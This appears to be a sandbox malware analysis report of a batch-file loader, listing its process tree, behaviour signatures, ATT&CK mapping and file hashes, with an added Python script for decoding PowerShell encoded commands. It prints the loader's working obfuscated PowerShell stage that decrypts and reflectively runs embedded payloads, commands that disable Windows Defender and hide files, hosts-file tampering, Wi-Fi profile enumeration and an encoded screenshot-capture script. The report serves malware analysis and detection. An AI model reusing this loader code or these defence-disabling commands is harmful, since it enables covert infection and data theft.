  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- C:\Windows\system32\svchost.exe (PID 1996)
  Command line: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- C:\Windows\system32\svchost.exe (PID 2064)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
- C:\Windows\System32\svchost.exe (PID 2080)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- C:\Windows\system32\svchost.exe (PID 2188)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
  Signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\svchost.exe (PID 2260)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- C:\Windows\system32\svchost.exe (PID 2424)
  Command line: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- C:\Windows\system32\svchost.exe (PID 2432)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- C:\Windows\system32\svchost.exe (PID 2620)
  Command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
  Signatures: Drops file in System32 directory; Modifies data under HKEY_USERS
- C:\Windows\system32\svchost.exe (PID 2640)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- C:\Windows\System32\svchost.exe (PID 2704)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- C:\Windows\system32\svchost.exe (PID 2712)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- C:\Windows\system32\svchost.exe (PID 3036)
  Command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- C:\Windows\system32\svchost.exe (PID 3188)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
- C:\Windows\system32\svchost.exe (PID 3396)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- C:\Windows\Explorer.EXE (PID 3464)
  Command line: C:\Windows\Explorer.EXE
  Signatures: Modifies registry class; Suspicious use of FindShellTrayWindow; Suspicious use of UnmapMainImage
  - C:\Windows\system32\cmd.exe (PID 3232)
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Cydex Loader.bat"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe (PID 3948)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O4mKwgT14Jf4GENcRygUG/d4BtYwQICwFCslZ/2DwpA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+iqDLVr+MkpW6N2Dl88sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gDOoY=New-Object System.IO.MemoryStream(,$param_var); $PYRCo=New-Object System.IO.MemoryStream; $UyrQy=New-Object System.IO.Compression.GZipStream($gDOoY, [IO.Compression.CompressionMode]::Decompress); $UyrQy.CopyTo($PYRCo); $UyrQy.Dispose(); $gDOoY.Dispose(); $PYRCo.Dispose(); $PYRCo.ToArray();}function execute_function($param_var,$param2_var){ $hsmns=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AqQxc=$hsmns.EntryPoint; $AqQxc.Invoke($null, $param2_var);}$oCUbh = 'C:\Users\Admin\AppData\Local\Temp\Cydex Loader.bat';$host.UI.RawUI.WindowTitle = $oCUbh;$MzdzK=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oCUbh).Split([Environment]::NewLine);foreach ($PIGwG in $MzdzK) { if ($PIGwG.StartsWith('hbEHolpLBZhWCglFYGUC')) { $ubKDq=$PIGwG.Substring(20); break; }}$payloads_var=[string[]]$ubKDq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); 
      "
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2532)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Drops file in Drivers directory; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\system32\attrib.exe (PID 2184)
        Command line: attrib +h +s C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Signatures: Drops file in System32 directory; Views/modifies file attributes
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2828)
        Command line: powershell -Command Add-MpPreference -ExclusionPath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
      - C:\Windows\system32\attrib.exe (PID 2996)
        Command line: attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        Signatures: Views/modifies file attributes
      - C:\Windows\System32\Wbem\wmic.exe (PID 924)
        Command line: wmic os get Caption
      - C:\Windows\System32\Wbem\wmic.exe (PID 1748)
        Command line: wmic cpu get Name
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4160)
        Command line: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        Signatures: Suspicious behavior: EnumeratesProcesses
      - C:\Windows\System32\Wbem\wmic.exe (PID 2148)
        Command line: wmic path win32_VideoController get name
        Signatures: Detects videocard installed
      - C:\Windows\System32\Wbem\wmic.exe (PID 4020)
        Command line: wmic csproduct get UUID
      - C:\Windows\system32\attrib.exe (PID 4896)
        Command line: attrib -r C:\Windows\System32\drivers\etc\hosts
        Signatures: Drops file in Drivers directory; Views/modifies file attributes
      - C:\Windows\system32\attrib.exe (PID 4964)
        Command line: attrib +r C:\Windows\System32\drivers\etc\hosts
        Signatures: Drops file in Drivers directory; Views/modifies file attributes
      - C:\Windows\system32\netsh.exe (PID 1452)
        Command line: netsh wlan show profiles
        Signatures: Event Triggered Execution: Netsh Helper DLL
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiA
G8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3148 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y0usiqio\y0usiqio.cmdline"
5⤵ PID:5076
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES431.tmp" "c:\Users\Admin\AppData\Local\Temp\y0usiqio\CSCFC90D99ABC045BC82CACA452B74165.TMP"
6⤵ PID:4760
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵ PID:3600
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵ PID:4548
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵ PID:2296
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵ PID:1440
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1304
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵ PID:3652
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵ PID:764
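The powershell.exe entry with PID 3148 above carries its payload in -EncodedCommand, which is base64 over UTF-16LE text rather than UTF-8. Decoded, it defines a C# Screenshot class in a here-string, compiles it with Add-Type -TypeDefinition against System.Drawing and System.Windows.Forms, walks Screen.AllScreens capturing each monitor with Graphics.CopyFromScreen, and saves the results as "Display (N).png" in the working directory; the csc.exe and cvtres.exe children (PIDs 5076 and 4760) writing y0usiqio.cmdline under %TEMP% are that Add-Type compile. The Python below is an added example, not tria.ge code and not part of the sample: it pulls the encoded argument out of a report process line of this shape (tolerating the mid-token line wrap and the depth marker glued after the argument, both visible above), decodes it, and flags behavioural indicators. The sample command line and script it runs on are constructed for the example; the parameter-prefix rules and the indicator list are assumptions made here, not taken from the report.

```python
"""Decode the PowerShell -EncodedCommand argument found on a sandbox process line.

Added example for this report; not tria.ge code and not part of the analysed
sample. Assumptions: the line has the shape the report prints (image path fused
to the command line, a depth marker such as "4⤵" glued after the argument) and
the base64 may have been wrapped onto more than one line by extraction.
"""
import base64
import re
from typing import Optional

_B64_CHARS = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
)

# Behaviours worth flagging in a decoded script. The first two are what this
# report's payload does; the rest are common cradle patterns (assumed list).
INDICATORS = {
    "in-memory C# compilation (Add-Type -TypeDefinition)":
        re.compile(r"Add-Type\s+-TypeDefinition", re.I),
    "screen capture (Screen.AllScreens / CopyFromScreen)":
        re.compile(r"CopyFromScreen|Screen\.AllScreens", re.I),
    "download cradle":
        re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "nested base64":
        re.compile(r"FromBase64String", re.I),
    "dynamic evaluation":
        re.compile(r"Invoke-Expression|\biex\b", re.I),
}


def is_encoded_command_flag(name: str) -> bool:
    """PowerShell accepts unambiguous parameter prefixes: -e, -ec and any
    prefix starting "en" resolve to -EncodedCommand, while -ex... is
    -ExecutionPolicy and must not match (assumption: Windows PowerShell rules)."""
    n = name.lower()
    return n in ("e", "ec") or (n.startswith("en") and "encodedcommand".startswith(n))


def extract_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the base64 text after the -EncodedCommand flag with wrapping
    whitespace removed, or None when the line carries no such flag."""
    for m in re.finditer(r"(?<!\S)[-/](\w+)\s+", cmdline):
        if not is_encoded_command_flag(m.group(1)):
            continue
        out, pad = [], 0
        for ch in cmdline[m.end():]:
            if ch.isspace():
                continue                 # wrapped base64: skip the line break
            if ch == "=" and pad < 2:
                out.append(ch)           # padding terminates the token
                pad += 1
                continue
            if pad or ch not in _B64_CHARS:
                break                    # e.g. the report's trailing "4⤵"
            out.append(ch)
        return "".join(out)
    return None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE text, not UTF-8."""
    if len(b64) % 4:
        raise ValueError("base64 length not a multiple of 4: truncated or mis-joined")
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def analyze_process_line(line: str) -> dict:
    """Decode the payload on one report process line and list indicators.
    Returns {} when the line has no encoded command."""
    b64 = extract_encoded_argument(line)
    if b64 is None:
        return {}
    script = decode_encoded_command(b64)
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    children = []
    if any("Add-Type" in h for h in hits):
        # Add-Type -TypeDefinition shells out to the .NET compiler, so a
        # csc.exe child (and its cvtres.exe child) with a *.cmdline file in
        # %TEMP% is the expected footprint, as in this report's process tree.
        children = ["csc.exe", "cvtres.exe"]
    return {"script": script, "indicators": hits, "expected_children": children}


# Constructed sample (not the report's payload): a tiny script of the same shape.
SAMPLE_SCRIPT = (
    '$src = @"\r\n'
    'public class S {}\r\n'
    '"@\r\n'
    'Add-Type -TypeDefinition $src -ReferencedAssemblies System.Drawing\r\n'
    '[S]::Go()\r\n'
)
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
# Mimic the report line: fused image path and command line, base64 wrapped onto
# a second line, depth marker "4⤵" glued to the end of the argument.
SAMPLE_LINE = (
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exepowershell.exe "
    "-NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + SAMPLE_B64[:40] + "\n" + SAMPLE_B64[40:] + "4⤵"
)

if __name__ == "__main__":
    report = analyze_process_line(SAMPLE_LINE)
    print(report["script"])
    print("indicators:", report["indicators"])
    print("expected children:", report["expected_children"])
```

Run as-is it decodes the constructed sample; paste the report's own -EncodedCommand value (both wrapped lines) into analyze_process_line to recover the Screenshot script. The base64 padding is what lets the extractor stop before the depth marker; a payload whose base64 happens to need no padding would have the trailing digit absorbed and fail the length check, so strip the marker by hand in that case.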
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution 1
Registry Run Keys / Startup Folder 1
Event Triggered Execution 1
Netsh Helper DLL 1
Privilege Escalation
Boot or Logon Autostart Execution 1
Registry Run Keys / Startup Folder 1
Event Triggered Execution 1
Netsh Helper DLL 1
Downloads
-
Filesize
2KB
MD5
d85ba6ff808d9e5444a4b369f5bc2730
SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5
6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
944B
MD5
62d94562013cad250e309b4091503254
SHA1
f658f6e53e980694f5ff5bae10455c21ee059a2e
SHA256
1ff2d02730e490230262e82169d667b1db011b405f53b3bb4345ed1ee3efc1d5
SHA512
282e6777407b759ba15e7410cefc8652ae362a5e9ae13dfb355a3044154ca018a8de2b98df0e83012ae98279480ee3b517c62d33c8122f078ea5f3732aaa2a97
-
Filesize
1KB
MD5
fb93d15c1450dd17fb3864a9de6ff3c9
SHA1
b83d2aedf0bec9757fde8df74d35fefcdf82dc06
SHA256
377769fb875148133467e39fb4edb154b4de766acd8b57c76359a7f48dec7ce5
SHA512
a7abbc4b005be7df9c3e2593559d69ceb6effc17fcb4332d9368dee11f86c24c713ae39b06978b6d195e3dc7f822c7baee2bed54b3aaa730063c3c925f070657
-
Filesize
60B
MD5
d17fe0a3f47be24a6453e9ef58c94641
SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
434KB
MD5
ab8cc043ba15e2deb92c7d6c6c062a7c
SHA1
02b97581e232e206000ba914c4dd6f052a08479f
SHA256
b67d9cff987979f49c14eaca055d8a476799f724fdb57e53045f06531260542e
SHA512
d586e4efcec2d0838145eac2d77c7b2220b8233a2301887d27eb857dbac23637bc554094d130facb58b39324177699daae69ed50109596f90d134d3922a4d3ba
-
Filesize
4KB
MD5
be49a8700c8e2387466acfb4b460254d
SHA1
cfd412da9dd01ce05c4004da804e1c15aa5e1971
SHA256
2724830f790ee55a37f0437714a3e34a5a930421584053772128015a59a1aa23
SHA512
72fdac4f19bed663086cce358b71ae22e171e874018ee7a03b83939bfe63492c2ac0d27e0bbc0baa8c5d84992a2416cf3848cdcb08385d37abf01b4dded506ae
-
Filesize
442KB
MD5
04029e121a0cfa5991749937dd22a1d9
SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
2KB
MD5
6e2386469072b80f18d5722d07afdc0b
SHA1
032d13e364833d7276fcab8a5b2759e79182880f
SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075
SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb
-
Filesize
652B
MD5
baed9fda34c44a7370a69ecf8c2ca846
SHA1
3ea236f4cd4551a44239257f482640f6ccbbad0d
SHA256
193cbcd6c21d81f455d68fbefead575b00054d45b3cd34e269e7ec5e1ecc5fb1
SHA512
de1d61832d35c51d49600304bdcdd668b2360dc013b22be6064221f6368ec9abbfd6c9c5e8fa6cd79cca2586522c00ac5679e69c534d973ed19aace75582f366
-
Filesize
1004B
MD5
c76055a0388b713a1eabe16130684dc3
SHA1
ee11e84cf41d8a43340f7102e17660072906c402
SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD5
5d72ca2d49f125c8cc03c8cce13cecc3
SHA1
44b611492eeb66e2a798581898439818f0bfc524
SHA256
46466b4e8427d3a01f7afbc2c86c27f6e99fb009ac9a879609e9263282b4d631
SHA512
d630b1cd58a900cd79726351ddbbc889006b92ec6804db1ff9393954bee9ba7e6f400ea7cc9234d1229f8f0e2b7f2d37409c3b1c2c3e04a7eeb1828b87e2849f